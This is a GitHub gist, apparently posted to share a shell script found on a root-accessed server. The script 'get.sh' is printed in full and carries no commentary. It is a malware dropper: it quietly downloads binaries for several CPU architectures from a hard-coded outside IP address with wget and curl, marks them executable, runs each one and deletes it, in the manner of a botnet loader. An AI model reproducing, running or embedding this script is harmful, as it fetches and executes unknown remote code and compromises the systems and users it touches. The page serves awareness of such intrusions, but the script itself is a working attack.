Skip to content

Instantly share code, notes, and snippets.

@wong2
Created March 31, 2016 08:30
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save wong2/4900989d75b2560a00a7e538235e3da8 to your computer and use it in GitHub Desktop.
Save wong2/4900989d75b2560a00a7e538235e3da8 to your computer and use it in GitHub Desktop.
root@li400-72:~# cat get.sh
#!/bin/bash
wget http://45.32.232.197/x86 --quiet
chmod +x x86
./x86
rm -rf x86
wget http://45.32.232.197/i686 --quiet
chmod +x i686
./i686
rm -rf i686
wget http://45.32.232.197/i586 --quiet
chmod +x i586
./i586
rm -rf i586
wget http://45.32.232.197/m68k --quiet
chmod +x m68k
./m68k
rm -rf m68k
curl -O http://45.32.232.197/x86 --silent
chmod +x x86
./x86
rm -rf x86
curl -O http://45.32.232.197/i686 --silent
chmod +x i686
./i686
rm -rf i686
curl -O http://45.32.232.197/i586 --silent
chmod +x i586
./i586
rm -rf i586
curl -O http://45.32.232.197/m68k --silent
chmod +x m68k
./m68k
rm -rf m68k
sleep 1
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment